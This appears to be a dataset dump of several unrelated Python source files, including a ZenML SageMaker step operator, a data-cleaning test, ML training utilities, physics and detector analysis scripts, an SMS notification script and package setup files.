| StarcoderdataPython |
3433419 | # Copyright (c) ZenML GmbH 2022. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
from typing import ClassVar, List, Optional
import sagemaker
from zenml.enums import StackComponentType
from zenml.repository import Repository
from zenml.stack import Stack, StackValidator
from zenml.stack.stack_component_class_registry import (
register_stack_component_class,
)
from zenml.step_operators import BaseStepOperator
from zenml.utils import docker_utils
from zenml.utils.source_utils import get_source_root_path
@register_stack_component_class
class SagemakerStepOperator(BaseStepOperator):
"""Step operator to run a step on Sagemaker.
This class defines code that builds an image with the ZenML entrypoint
to run using Sagemaker's Estimator.
Attributes:
role: The role that has to be assigned to the jobs which are
running in Sagemaker.
instance_type: The type of the compute instance where jobs will run.
base_image: [Optional] The base image to use for building the docker
image that will be executed.
bucket: [Optional] Name of the S3 bucket to use for storing artifacts
from the job run. If not provided, a default bucket will be created
based on the following format: "sagemaker-{region}-{aws-account-id}".
experiment_name: [Optional] The name for the experiment to which the job
will be associated. If not provided, the job runs would be
independent.
"""
role: str
instance_type: str
base_image: Optional[str] = None
bucket: Optional[str] = None
experiment_name: Optional[str] = None
# Class Configuration
FLAVOR: ClassVar[str] = "sagemaker"
@property
def validator(self) -> Optional[StackValidator]:
"""Validates that the stack contains a container registry."""
def _ensure_local_orchestrator(stack: Stack) -> bool:
return stack.orchestrator.FLAVOR == "local"
return StackValidator(
required_components={StackComponentType.CONTAINER_REGISTRY},
custom_validation_function=_ensure_local_orchestrator,
)
def _build_docker_image(
self,
pipeline_name: str,
requirements: List[str],
entrypoint_command: List[str],
) -> str:
repo = Repository()
container_registry = repo.active_stack.container_registry
if not container_registry:
raise RuntimeError("Missing container registry")
registry_uri = container_registry.uri.rstrip("/")
image_name = f"{registry_uri}/zenml-sagemaker:{pipeline_name}"
docker_utils.build_docker_image(
build_context_path=get_source_root_path(),
image_name=image_name,
entrypoint=" ".join(entrypoint_command),
requirements=set(requirements),
base_image=self.base_image,
)
docker_utils.push_docker_image(image_name)
return docker_utils.get_image_digest(image_name) or image_name
def launch(
self,
pipeline_name: str,
run_name: str,
requirements: List[str],
entrypoint_command: List[str],
) -> None:
"""Launches a step on Sagemaker.
Args:
pipeline_name: Name of the pipeline which the step to be executed
is part of.
run_name: Name of the pipeline run which the step to be executed
is part of.
entrypoint_command: Command that executes the step.
requirements: List of pip requirements that must be installed
inside the step operator environment.
"""
image_name = self._build_docker_image(
pipeline_name=pipeline_name,
requirements=requirements,
entrypoint_command=entrypoint_command,
)
session = sagemaker.Session(default_bucket=self.bucket)
estimator = sagemaker.estimator.Estimator(
image_name,
self.role,
instance_count=1,
instance_type=self.instance_type,
sagemaker_session=session,
)
# Sagemaker doesn't allow any underscores in job/experiment/trial names
sanitized_run_name = run_name.replace("_", "-")
experiment_config = {}
if self.experiment_name:
experiment_config = {
"ExperimentName": self.experiment_name,
"TrialName": sanitized_run_name,
}
estimator.fit(
wait=True,
experiment_config=experiment_config,
job_name=sanitized_run_name,
)
| StarcoderdataPython |
12860399 | """
Ensures there is no data past the deactivation date for deactivated participants.
Original Issue: DC-686
The intent is to sandbox and drop records dated after the date of deactivation for participants
who have deactivated from the Program
This test will mock calling the PS API and provide a returned value. Everything
within the bounds of our team will be tested.
"""
# Python imports
import mock
import os
# Third party imports
import pandas as pd
# Project imports
from app_identity import PROJECT_ID
from common import OBSERVATION
from cdr_cleaner.cleaning_rules.remove_participant_data_past_deactivation_date import (
RemoveParticipantDataPastDeactivationDate)
from constants.retraction.retract_deactivated_pids import DEACTIVATED_PARTICIPANTS
from tests.integration_tests.data_steward.cdr_cleaner.cleaning_rules.bigquery_tests_base import BaseTest
class RemoveParticipantDataPastDeactivationDateTest(
BaseTest.CleaningRulesTestBase):
@classmethod
def setUpClass(cls):
print('**************************************************************')
print(cls.__name__)
print('**************************************************************')
super().initialize_class_vars()
# set the test project identifier
project_id = os.environ.get(PROJECT_ID)
cls.project_id = project_id
# set the expected test datasets
dataset_id = os.environ.get('COMBINED_DATASET_ID')
cls.dataset_id = dataset_id
sandbox_id = f"{dataset_id}_sandbox"
cls.sandbox_id = sandbox_id
cls.kwargs = {
'table_namer': 'bar_ds',
'api_project_id': 'foo-project-id'
}
cls.rule_instance = RemoveParticipantDataPastDeactivationDate(
project_id, dataset_id, sandbox_id, **cls.kwargs)
sb_table_names = cls.rule_instance.get_sandbox_tablenames()
cls.fq_sandbox_table_names = [
f'{project_id}.{sandbox_id}.{table_name}'
for table_name in sb_table_names
]
# append table name here to ensure proper cleanup
cls.fq_sandbox_table_names.append(
f"{project_id}.{sandbox_id}.{DEACTIVATED_PARTICIPANTS}")
cls.fq_table_names = [
f"{project_id}.{dataset_id}.{tablename}"
for tablename in cls.rule_instance.affected_tables
]
cls.fq_obs_table = [
table for table in cls.fq_table_names if 'observation' in table
][0]
# call super to set up the client, create datasets, and create
# empty test tables
# NOTE: does not create empty sandbox tables.
super().setUpClass()
def setUp(self):
"""
Add data to the tables for the rule to run on.
"""
insert_fake_data_tmpls = [
self.jinja_env.from_string("""
INSERT INTO `{{fq_table_name}}`
(observation_id, person_id, observation_concept_id, observation_date,
observation_type_concept_id, observation_source_concept_id)
VALUES
-- Values to exist after running the cleaning rule --
-- 801 is before the user deactivates --
-- 802, the user doesn't deactivate --
(801, 1, 1585899, date('2019-05-01'), 45905771, 111111),
(802, 2, 1585899, date('2019-05-01'), 45905771, 222222),
-- Values that should be removed by the cleaning rule --
-- 804 is after person 1 deactivates --
-- 805 is after user 3 deactivates --
(804, 1, 1585899, date('2020-05-01'), 45905771, null),
(805, 3, 1585899, date('2020-05-01'), 45905771, 45)
""")
]
self.load_statements = []
# create the string(s) to load the data
for tmpl in insert_fake_data_tmpls:
query = tmpl.render(fq_table_name=self.fq_obs_table)
self.load_statements.append(query)
super().setUp()
@mock.patch(
'utils.participant_summary_requests.get_deactivated_participants')
@mock.patch('retraction.retract_utils.is_deid_label_or_id')
def test_removing_data_past_deactivated_date(self, mock_deid, mock_func):
"""
Validate deactivated participant records are dropped via cleaning rule.
Validates pre-conditions, test execution and post conditions based on
the load statements and the tables_and_counts variable. Uses a mock to
return a staged data frame object for this test instead of calling
the PS API.
"""
columns = ['deactivated_date', 'person_id', 'suspension_status']
values = [
['2020-01-01', 1, 'NO_CONTACT'], # corresponds with record 804
['2020-01-01', 3, 'NO_CONTACT'] # corresponds with record 805
]
deactivated_df = pd.DataFrame(values, columns=columns)
mock_func.return_value = deactivated_df
mock_deid.return_value = False
self.load_test_data(self.load_statements)
# Using the 0 position because there is only one sandbox table and
# one affected OMOP table
obs_sandbox = [
table for table in self.fq_sandbox_table_names
if 'observation' in table
][0]
tables_and_counts = [{
'name': 'observation',
'fq_table_name': self.fq_obs_table,
'fq_sandbox_table_name': obs_sandbox,
'fields': ['observation_id'],
'loaded_ids': [801, 802, 804, 805],
'sandboxed_ids': [804, 805],
'cleaned_values': [(801,), (802,)]
}]
self.default_test(tables_and_counts)
| StarcoderdataPython |
1639877 | <filename>algorithms/algo.py<gh_stars>0
import sys
import numpy as np
import argparse
import copy
import random
import json
import torch
from torch.autograd import grad
from torch import nn, optim
from torch.nn import functional as F
from torchvision import datasets, transforms
from torchvision.utils import save_image
from torch.autograd import Variable
import torch.utils.data as data_utils
from utils.match_function import get_matched_pairs
class BaseAlgo():
def __init__(self, args, train_dataset, val_dataset, test_dataset, train_domains, total_domains, domain_size, training_list_size, base_res_dir, run, cuda):
self.args= args
self.train_dataset= train_dataset
self.val_dataset= val_dataset
self.test_dataset= test_dataset
self.train_domains= train_domains
self.total_domains= total_domains
self.domain_size= domain_size
self.training_list_size= training_list_size
self.base_res_dir= base_res_dir
self.run= run
self.cuda= cuda
self.post_string= str(self.args.penalty_ws) + '_' + str(self.args.penalty_diff_ctr) + '_' + str(self.args.match_case) + '_' + str(self.args.match_interrupt) + '_' + str(self.args.match_flag) + '_' + str(self.run) + '_' + self.args.pos_metric + '_' + self.args.model_name
self.phi= self.get_model()
self.opt= self.get_opt()
self.scheduler = torch.optim.lr_scheduler.StepLR(self.opt, step_size=25)
self.final_acc=[]
self.val_acc=[]
def get_model(self):
if self.args.model_name == 'lenet':
from models.lenet import LeNet5
phi= LeNet5()
if self.args.model_name == 'alexnet':
from models.alexnet import alexnet
phi= alexnet(self.args.out_classes, self.args.pre_trained, self.args.method_name)
if self.args.model_name == 'domain_bed_mnist':
from models.domain_bed_mnist import DomainBed
phi= DomainBed( self.args.img_c )
if 'resnet' in self.args.model_name:
from models.resnet import get_resnet
if self.args.method_name in ['csd', 'matchdg_ctr']:
fc_layer=0
else:
fc_layer= self.args.fc_layer
phi= get_resnet(self.args.model_name, self.args.out_classes, fc_layer,
self.args.img_c, self.args.pre_trained)
print('Model Architecture: ', self.args.model_name)
phi=phi.to(self.cuda)
return phi
def save_model(self):
# Store the weights of the model
torch.save(self.phi.state_dict(), self.base_res_dir + '/Model_' + self.post_string + '.pth')
def get_opt(self):
if self.args.opt == 'sgd':
opt= optim.SGD([
{'params': filter(lambda p: p.requires_grad, self.phi.parameters()) },
], lr= self.args.lr, weight_decay= 5e-4, momentum= 0.9, nesterov=True )
elif self.args.opt == 'adam':
opt= optim.Adam([
{'params': filter(lambda p: p.requires_grad, self.phi.parameters())},
], lr= self.args.lr)
return opt
def get_match_function(self, epoch):
#Start initially with randomly defined batch; else find the local approximate batch
if epoch > 0:
inferred_match=1
if self.args.match_flag:
data_match_tensor, label_match_tensor, indices_matched, perfect_match_rank= get_matched_pairs( self.args, self.cuda, self.train_dataset, self.domain_size, self.total_domains, self.training_list_size, self.phi, self.args.match_case, inferred_match )
else:
temp_1, temp_2, indices_matched, perfect_match_rank= get_matched_pairs( self.args, self.cuda, self.train_dataset, self.domain_size, self.total_domains, self.training_list_size, self.phi, self.args.match_case, inferred_match )
else:
inferred_match=0
data_match_tensor, label_match_tensor, indices_matched, perfect_match_rank= get_matched_pairs( self.args, self.cuda, self.train_dataset, self.domain_size, self.total_domains, self.training_list_size, self.phi, self.args.match_case, inferred_match )
return data_match_tensor, label_match_tensor
def get_test_accuracy(self, case):
#Test Env Code
test_acc= 0.0
test_size=0
if case == 'val':
dataset= self.val_dataset
elif case == 'test':
dataset= self.test_dataset
for batch_idx, (x_e, y_e ,d_e, idx_e) in enumerate(self.test_dataset):
with torch.no_grad():
x_e= x_e.to(self.cuda)
y_e= torch.argmax(y_e, dim=1).to(self.cuda)
d_e = torch.argmax(d_e, dim=1).numpy()
#Forward Pass
out= self.phi(x_e)
test_acc+= torch.sum( torch.argmax(out, dim=1) == y_e ).item()
test_size+= y_e.shape[0]
print(' Accuracy: ', case, 100*test_acc/test_size )
return 100*test_acc/test_size | StarcoderdataPython |
87014 | <filename>pychron/canvas/canvas2D/scene/primitives/dumper_primitives.py
# ===============================================================================
# Copyright 2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import Dict
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.canvas.canvas2D.scene.primitives.rounded import RoundedRectangle
class StateableRectangle(RoundedRectangle):
states = Dict
def set_state(self, state):
if isinstance(state, bool):
state = "open" if state else "closed"
state_dict = self.states[state]
self._set_dimensions(state_dict.get("dimension"))
self._set_translation(state_dict.get("translation"))
self.request_layout()
def _set_dimensions(self, wh):
if wh:
self.width, self.height = wh
def _set_translation(self, xy):
if xy:
self.x, self.y = xy
class Gate(StateableRectangle):
pass
class Funnel(StateableRectangle):
pass
# ============= EOF =============================================
| StarcoderdataPython |
326636 | # (C) Copyright 1996- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
import pathlib
from aviso_monitoring import __version__
from setuptools import find_packages, setup
INSTALL_REQUIRES = (pathlib.Path(__file__).parent / "requirements.txt").read_text().splitlines()
setup(
name="aviso-monitoring",
description="Aviso_monitoring is a library providing collectors to fetch telemetries, receivers and reporters to "
"transmit them to the monitoring servers",
version=__version__,
url="https://git.ecmwf.int/projects/AVISO/repos/aviso/browse",
author="ECMWF",
packages=find_packages(),
zip_safe=False,
include_package_data=True,
install_requires=INSTALL_REQUIRES,
entry_points={},
)
| StarcoderdataPython |
4968682 | <reponame>leglars/ThinkingofYou<filename>AM-flask/app/send_sms.py
# from twilio.rest import TwilioRestClient
#
# account_sid = 'ACd7a0898f812377ef06121f8611f11b1e'
# auth_token = '<PASSWORD>'
# client = TwilioRestClient(account_sid, auth_token)
import plivo
import ENV_VAR as ENV
auth_id = ENV.PLIVO["id"]
auth_token = ENV.PLIVO["token"]
p = plivo.RestAPI(auth_id, auth_token)
_ADMIN_NUMBER = "61478417108"
_ADMIN_LIST = ["61424945548", "61478417108"]
_SERVICE_NUMBER = "61429968959"
_TEST_QUESTION = "this is a test message from ThinkingofYou"
# Auto daily message start #####################################
def send_message(to_number=_ADMIN_NUMBER, question=_TEST_QUESTION):
# client.messages.create(
# to=to,
# from_=_SERVICE_NUMBER,
# body=question
# )
params = {
'src': _SERVICE_NUMBER,
'dst': to_number,
'text': question,
# 'url': "http://thinkingofyou.uqcloud.net/automessage/report",
'method': "POST"
}
response = p.send_message(params)
"""
This is an example of response:
tuple(int, dictionary{})
(
202,
{
'message_uuid': ['3829ba15-12c8-499b-aa88-730619e17272'],
'message': 'message(s) queued',
'api_id': 'b1d5f55d-27f8-11e6-be4a-22000ae40186'
}
)
"""
return response
def reply_message(from_number, text="Thanks, we've received your message.", to_number=_SERVICE_NUMBER):
"""
:param from_number: get who send this message
:param text: this is the default message
:param to_number: here, we just have 1 service number, if the app need send many messages, maybe have more than one
service number, so this parameter would be useful to identify
"""
params = {
"src": to_number,
"dst": from_number,
"text": text,
"method": "POST"
}
# # Generate a Message XML with the details of
# # the reply to be sent.
# r = plivoxml.Response()
# r.addMessage(text, **params)
response = p.send_message(params)
return response
def error_response_warning(error, user, name, question):
error_body = "User " + user + "'s contact " + name + " may arouse a wrong response for question " + question \
+ "\nThe response is here: " + error
params = {
'src': _SERVICE_NUMBER,
'dst': _ADMIN_NUMBER,
'text': error_body,
# 'url': "http://thinkingofyou.uqcloud.net/automessage/report",
'method': "POST"
}
# client.messages.create(
# to=_ADMIN_NUMBER,
# from_=_SERVICE_NUMBER,
# body=error_body
# )
def error_response_number(text, number):
error_body = "Get a response from an unknown number: " + number + "\nThe content is here: " + text
for num in _ADMIN_LIST:
send_message(num, error_body)
def error_logging_fail(text, number):
warning = "WARNING: logging fail\nNumber: " + number + "\nContent: " + text
send_message(_ADMIN_NUMBER, warning)
# Auto daily message End ###################################################
# TOY message start ########################################################
def send_toy_message(contact_name, username, to_number=_ADMIN_NUMBER):
message = "I'm Thinking of You, " + contact_name + "!\n-- A message from " + username
return send_message(to_number, message)
def error_toy_message_sending_fail(username, to_number=_ADMIN_NUMBER):
warning = "WARNING: " + username + " can't send toy message, post function failure!"
return send_message(to_number, warning)
def error_toy_email_sending_fail(email, to_number=_ADMIN_NUMBER):
warning = "WARNING: " + email + " can't be reached!"
return send_message(to_number, warning)
def error_device_page_hidden(username, to_number=_ADMIN_NUMBER):
warning = "WARNING: " + username + "'s page be hidden!"
return send_message(to_number, warning)
send_message("61418150854", "Have you had any contact with Roy today Y/N. Sorry for the delay on first day. The program has something wrong because a new change be added today.")
| StarcoderdataPython |
339830 | <gh_stars>100-1000
from __future__ import absolute_import, division, print_function
from six.moves import range
# LIBTBX_SET_DISPATCHER_NAME xpp.beamcenter
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export PHENIX_GUI_ENVIRONMENT=1
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export BOOST_ADAPTBX_FPE_DEFAULT=1
import sys,os
from scitbx.array_family import flex
from scitbx.matrix import sqr, col
from math import sin, cos, pi
import dxtbx
from xfel.metrology.legacy_scale import quadrant_self_correlation
import libtbx.phil
master_phil = libtbx.phil.parse("""
beam_center_fast = None
.type = int
.help = Initial estimate of beam center (fast coordinate)
beam_center_slow = None
.type = int
.help = Initial estimate of beam center (slow coordinate)
px_max = None
.type = int
.help = Only test pixels this distance or less from the initial beam center estimate
px_min = None
.type = int
.help = Only test pixels this distance or more from the initial beam center estimate
show_plots = False
.type = bool
.help = If True, show the pixels that will be tested and the rotational self-correlations from the grid search
""")
if (__name__ == "__main__"):
files = [arg for arg in sys.argv[1:] if os.path.isfile(arg)]
arguments = [libtbx.phil.parse(arg) for arg in sys.argv[1:] if not os.path.isfile(arg)]
params = master_phil.fetch(sources=arguments).extract()
rot45 = sqr((sin(pi/4.),-cos(pi/4.),cos(pi/4.),sin(pi/4.)))
for file in files:
message="""Based on the file %s, this program will compute incremental translations to circularize
powder rings. The algorithm scores based on self-correlation upon 45-degree rotation.
Increments are determined ON TOP OF beam center value in image header. Output is given in the form of
delta to that value."""%file
print(message)
img = dxtbx.load(file)
beam = img.get_beam()
s0 = beam.get_s0()
raw_data = img.get_raw_data()
if not isinstance(raw_data, tuple):
raw_data = (raw_data,)
for panel_id, panel in enumerate(img.get_detector()):
beam_center = col(panel.get_beam_centre_px(s0))
data = raw_data[panel_id]
print("Assembling mask...", end=' '); sys.stdout.flush()
mask = panel.get_trusted_range_mask(data)
trusted_min = panel.get_trusted_range()[0]
mask_center = col((params.beam_center_slow,params.beam_center_fast))
px_max = params.px_max
px_min = params.px_min
data = data[mask_center[0] - px_max:mask_center[0] + px_max, mask_center[1] - px_max:mask_center[1] + px_max]
mask = mask[mask_center[0] - px_max:mask_center[0] + px_max, mask_center[1] - px_max:mask_center[1] + px_max]
panel_origin = col((mask_center[0] - px_max,mask_center[1] - px_max))
for y in range(mask.focus()[1]):
for x in range(mask.focus()[0]):
l = (col((x-px_max+mask_center[0],y-px_max+mask_center[1])) - mask_center).length()
if l < px_min or l > px_max:
mask[x,y] = False
data.set_selected(~mask, trusted_min-1)
print("done")
if params.show_plots:
from matplotlib import pyplot as plt
plt.imshow(data.as_numpy_array())
plt.show()
grid_radius = 20
mapp = flex.double(flex.grid(2*grid_radius+1, 2*grid_radius+1))
print(mapp.focus())
gmax = 0.0
coordmax = (0,0)
for xi in range(-grid_radius, grid_radius+1):
for yi in range(-grid_radius, grid_radius+1):
test_bc = beam_center + col((xi,yi))
print("Testing beam center", test_bc.elems, end=' ')
REF,ROT = quadrant_self_correlation(data,panel_origin,test_bc,rot45,trusted_min)
CCRR = flex.linear_correlation(REF,ROT)
VV = CCRR.coefficient()
if VV>gmax:
gmax = VV
coordmax = col((xi,yi))
mapp[(xi+grid_radius,yi+grid_radius)]=VV
print(VV)
print("max cc %7.4F is at "%gmax, (beam_center + coordmax).elems, "(slow, fast). Delta:", coordmax.elems)
if params.show_plots:
npy = mapp.as_numpy_array()
from matplotlib import pyplot as plt
plt.imshow(npy, cmap="hot")
plt.plot([coordmax[1]+grid_radius],[coordmax[0]+grid_radius],"k.")
plt.show()
| StarcoderdataPython |
11316149 | <reponame>smartalecH/BYUqot<gh_stars>1-10
# Material dispersion example, from the Meep tutorial. Here, we simply
# simulate homogenous space filled with a dispersive material, and compute
# its modes as a function of wavevector k. Since omega/c = k/n, we can
# extract the dielectric function epsilon(omega) = (ck/omega)^2.
from __future__ import division
# Get project library path to import library files
import sys
import os
d = os.path.dirname(os.getcwd())
libPath = os.path.abspath(os.path.join(d, 'lib'))
sys.path.insert(0, libPath)
import meep as mp
import SiP_Materials
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
# Speed of light in vacuum, m/s
c = 3e8
# default unit length is 1 um
um_scale = 1.0
SiO2_range = mp.FreqRange(min=1/1.77, max=1/0.25)
SiO2_frq1 = 1/(0.103320160833333*um_scale)
SiO2_gam1 = 0#1/(12.3984193000000*um_scale)
SiO2_sig1 = 1.12
SiO2_susc = [ mp.LorentzianSusceptibility(frequency=SiO2_frq1, gamma=SiO2_gam1, sigma=SiO2_sig1) ]
SiO2 = mp.Medium(epsilon=1.0, E_susceptibilities=SiO2_susc, valid_freq_range=SiO2_range)
# ---------------------------------------------------------------------------- #
# Let's view silicon's theoretical refractive index plot
# ---------------------------------------------------------------------------- #
# Data from Lukas's handbook
eps = 1
eps_lorentz = SiO2_sig1
omega0 = 2*np.pi*3e8*SiO2_frq1*1e6
print(omega0)
delta0 = 0
# Generate data to plot over valid range
lambdaMin = 0.25e-6
lambdaMax = 1.77e-6
lambdaN = 100
lambdaPlot = np.linspace(lambdaMin,lambdaMax,lambdaN)
num = eps_lorentz * (omega0**2)
den = (omega0**2 - 2*1j*delta0*2*np.pi * c / lambdaPlot - (2*np.pi*c/lambdaPlot)**2)
#epsilonTheory = eps + num / den
epsLam = lambda x: eps + (eps_lorentz * (omega0**2)) / ((omega0**2 - 2*1j*delta0*2*np.pi * c / (x*1e-6) - (2*np.pi*c/(x*1e-6))**2))
epsilonTheory = epsLam(lambdaPlot*1e6)
# ---------------------------------------------------------------------------- #
# Let's load experimental data
# ---------------------------------------------------------------------------- #
# Reference:
# <NAME>. Refractive index of silicon and germanium and its wavelength and
# temperature derivatives, J. Phys. Chem. Ref. Data 9, 561-658 (1993)
filename = 'SiData.csv'
expdata = np.genfromtxt(fname=filename,delimiter=',',skip_header=1)
# ---------------------------------------------------------------------------- #
# Let's simulate the w-k plot and eps plot
# ---------------------------------------------------------------------------- #
# Now let's rearrange the data to the form Meep uses
cell = mp.Vector3()
resolution = 30
fcen = 1
df = 4
sources = [mp.Source(mp.GaussianSource(fcen, fwidth=df), component=mp.Ez, center=mp.Vector3())]
kmin = 1/1.7
kmax = 1/0.25
k_interp = 10
kpts = mp.interpolate(k_interp, [mp.Vector3(kmin), mp.Vector3(kmax)])
sim = mp.Simulation(
cell_size=cell,
geometry=[],
sources=sources,
default_material=SiO2,
resolution=resolution
)
# Extract out omega from each k vector
all_freqs = sim.run_k_points(300, kpts) # a list of lists of frequencies
print(all_freqs)
# Get wavelength data in microns
k = np.asarray([v.x for v in kpts])
# Get Omega
f = np.asarray([v[0] for v in all_freqs])
lambdaEst = 1 / k
# Get refractive index info
n_meep = k/f
err = abs(np.sqrt(epsLam(lambdaEst)) - n_meep) / np.sqrt(epsLam(lambdaEst)) * 100
print('Error:')
print(err)
# ---------------------------------------------------------------------------- #
# Plot data
# ---------------------------------------------------------------------------- #
plt.plot(lambdaPlot*1e6,np.sqrt(epsilonTheory))
plt.hold(True)
#plt.plot(expdata[:,0],expdata[:,1],'o')
plt.plot(lambdaEst,n_meep,'o')
plt.hold(True)
plt.xlim(lambdaMin*1e6,lambdaMax*1e6)
plt.xlabel('Wavelength ($\mu m$)')
plt.ylabel('Index of Refraction')
plt.show()
| StarcoderdataPython |
5084822 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from infra.libs.gerrit_api.gerrit_api import (
AccessViolationException, Gerrit, RevisionConflictException,
UnexpectedResponseException)
from infra.libs.gerrit_api.credentials import (
Credentials, CredentialsException, GitcookiesException, NetrcException,
get_default_credentials, get_default_gitcookies_path,
get_default_netrc_path, load_netrc_file, load_gitcookie_file)
| StarcoderdataPython |
5084535 | # To use the instance return type from static methods
from __future__ import annotations
from datetime import datetime
from pathlib import Path
from toolz import curry, partition_all, get
from typing import Mapping, Union, Iterator
from uuid import UUID
from uuid import uuid4
from mmlp.Config import Config
from mmlp.data import Method
from mmlp.data import ModelSnapshot
from mmlp.endpoint.compute.utils import transform_dataclass_to_dict
from mmlp.manager.utils.utils import load_objects_from_storage
from mmlp.utils import ensure_uuid, excepting_pipe
from mmlp.utils.utils import write_json_file
class MethodManager:
def __init__(self, config: Config, methods: Mapping[UUID, Method]):
self._config: Config = config
self._methods: Mapping[UUID, Method] = methods
if hasattr(self._methods, "keys"):
print(f'MethodManager: Loaded {len(self._methods.keys())} methods')
else:
print("FATAL MethodManager: Could not load methods, sorry :(")
@staticmethod
def load(config: Config) -> MethodManager:
# print(f'MethodManager: Loading models from: {config.model_base_dir}')
return MethodManager(config=config,
methods=load_objects_from_storage(metadata_filename=config.method_filename,
class_factory=Method,
root_directory=config.model_base_dir))
def create_method(self, name: str, description: str, snap: ModelSnapshot) -> Union[Exception, ModelSnapshot]:
if (Path(snap.storage_path) / self._config.method_filename).exists():
return Exception("create_method", "A method for this snapshot already exist.")
# create method object
method = Method.from_dict(dict(
id=uuid4(),
name=name,
created=str(datetime.now()),
description=description,
model_snapshot=snap
))
# Create method on filesystem
write_json_file(str(Path(snap.storage_path) / self._config.method_filename),
transform_dataclass_to_dict(method))
# add method object
self._methods[method.id] = method
return method
def remove_method(self, method: Method) -> Union[Exception, Method]:
if not self._methods.get(method.id, None):
raise Exception("remove_method", f"Method {method.id} is not known")
# Remove the method file from filesystem
# Only delete the method (snapshot is still there)!
(Path(method.model_snapshot.storage_path) / self._config.method_filename).unlink()
# Remove object from collection
self._methods.pop(method.id)
return method
def get_method(self, method_id: UUID) -> Union[Exception, Method]:
method = self._methods.get(ensure_uuid(method_id))
return method if method else Exception(f'method: {method_id} not found')
def list_methods(self, query: dict) -> Iterator[ModelSnapshot]:
"""
List all methods
:param query:
:return:
"""
return excepting_pipe(
self._methods.values(),
curry(sorted, key=lambda x: getattr(x, query['sortby']), reverse=query['order']),
curry(partition_all)(query['limit'] if query['limit'] > 0 else len(self._methods.values())),
list,
curry(get, default=[])(query['offset'])
)
def count_methods(self) -> int:
return len(self._methods)
| StarcoderdataPython |
11231177 | import numpy as np
from tqdm import tqdm
import pandas as pd
import uproot
from sklearn.preprocessing import MinMaxScaler
Run2_MC = '/eos/lhcb/wg/FlavourTagging/tuples/development/IFT/data_Feb2021/fttuple_data_2016_28r2_TrT.root'
tree = 'Bd2JpsiKstarDetached/DecayTree'
# there are two indexes in this data-set: B-candidate index (main index) and dependent one called B_len, this is the track index
br_l = uproot.open(Run2_MC)[tree].keys()
# get all Features which start with "Tr_"
tr_l = [x for x in br_l if x.startswith("Tr_")]
# get all Features which start with "B_"
b_vars = [ x for x in br_l if x.startswith("B_")]
print('Number of columns: '+str(len(b_vars)))
scaler = MinMaxScaler()
events = uproot.open(Run2_MC+':'+ tree )
i = 0
# run over the data set in chnuk of 200 MB to reduce the load on the RAM, delete the df after saving it at the end of the loop:
for df in events.iterate(step_size="200 MB", expressions= b_vars, library="pd"):
# cast to reduce the size of the output file:
df[df.select_dtypes(bool).columns] = df.select_dtypes(bool).astype('int32')
df[df.select_dtypes('float64').columns] = df.select_dtypes('float64').astype('float32')
df[df.select_dtypes('int64').columns] = df.select_dtypes('int64').astype('int32')
df[df.select_dtypes(object).columns] = df.select_dtypes(object).astype('float32')
#print(df.dtypes)
# let us start the juggling !! :
# to select in basis of a given index (here we would like to select based on track feature ) we follow two step procedure:
#1- explode everything to be dependent on the track index
df = df.apply( lambda x: x.explode() if x.name.startswith("Tr_") else x)
#2- Select :
df = df.query('(Tr_T_AALLSAMEBPV==1 | Tr_T_BPVIPCHI2>6) & Tr_T_TRGHOSTPROB<0.35 & Tr_T_P>2000 & B_DIRA_OWNPV>0.9995')
# build additonal features :
df['Tr_T_diff_z'] = df['B_OWNPV_Z'] - df['Tr_T_TrFIRSTHITZ']
df['Tr_T_cos_diff_phi'] = np.cos( df['B_LOKI_PHI'] - [y for y in df['Tr_T_Phi']] )
df['Tr_T_diff_eta'] = df['B_LOKI_ETA'] - [y for y in df['Tr_T_Eta'] ]
df['Tr_T_P_proj'] = [np.vdot(x,y) for x, y in zip(df[['B_PX', 'B_PY', 'B_PZ', 'B_PE']].values, df[['Tr_T_PX', 'Tr_T_PY', 'Tr_T_PZ', 'Tr_T_E']].values)]
# now we go back to the b-candidate index :
df = df.set_index([df.index,'B_len'])
# we would like to choose the first 40 track with the highest pT (and remove the other entries per B-candidate index).
# here is how it is done:
# 1- simply sort the valuies
df = df.sort_values('Tr_T_AALLSAMEBPV',ascending=False).sort_index(level=0)
# 2- use groupby and head combination to chop any other track which is not in the set of "first 40 highest pT"
df = df.groupby(level=0).head(40)
# pickle everything :
df.to_pickle('/eos/lhcb/user/b/bkhanji/FT/MC/Bd2JpsiKst_' + suffix + '_fltrd_'+str(i)+'.pkl')
i = i+1
#print(df)
# we are done !
del df
| StarcoderdataPython |
5198047 | <gh_stars>0
#!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
requirements = [
'Click>=7.0',
'gevent>=1.4.0',
'jsonobject>=0.9.9',
'sh>=1.0.9',
'PyYAML>=5.1',
'contextlib2>=0.5.5',
]
setup_requirements = ['pytest-runner', ]
setup(
author="Dimagi",
author_email='<EMAIL>',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
